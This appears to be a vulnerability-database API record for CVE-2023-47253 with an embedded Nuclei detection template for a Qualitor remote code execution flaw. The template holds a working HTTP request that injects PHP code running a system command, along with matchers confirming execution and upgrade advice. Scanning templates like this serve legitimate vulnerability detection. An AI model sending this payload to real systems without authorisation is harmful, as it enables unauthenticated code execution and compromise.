{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-47253/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-47253/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-47253/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-47253/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-47253/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-47253"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-47253"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-47253.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-47253\n\ninfo:\n  name: Qualitor <= 8.20 - Remote Code Execution\n  author: s4e-io\n  severity: critical\n  description: |\n    Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands via PHP code injection, potentially compromising the entire Qualitor system.\n  remediation: |\n    Upgrade Qualitor to version 8.21 or later.\n  reference:\n    - https://github.com/vnxdtzip/CVE-2023-47253\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-47253\n    - https://openxp.xpsecsecurity.io/blog/cve-2023-47253\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-47253\n    cwe-id: CWE-77\n    epss-score: 0.14308\n    epss-percentile: 0.96445\n    cpe: cpe:2.3:a:qualitor:qalitor:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: qualitor\n    product: qualitor\n    fofa-query: \"Qualitor\"\n  tags: cve,cve2023,rce,qualitor,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body,\"Windows\",\"DNS\")'\n          - 'contains(content_type,\"text/javascript\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a00463044022003a405e53d7185f6ad33af15231b67a91aff775c44791604724acf145009309a02204ca62ef198f31198767036015dfcc8cb959bf28af1b2eec7ef65755ed8023df7:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-47253"
}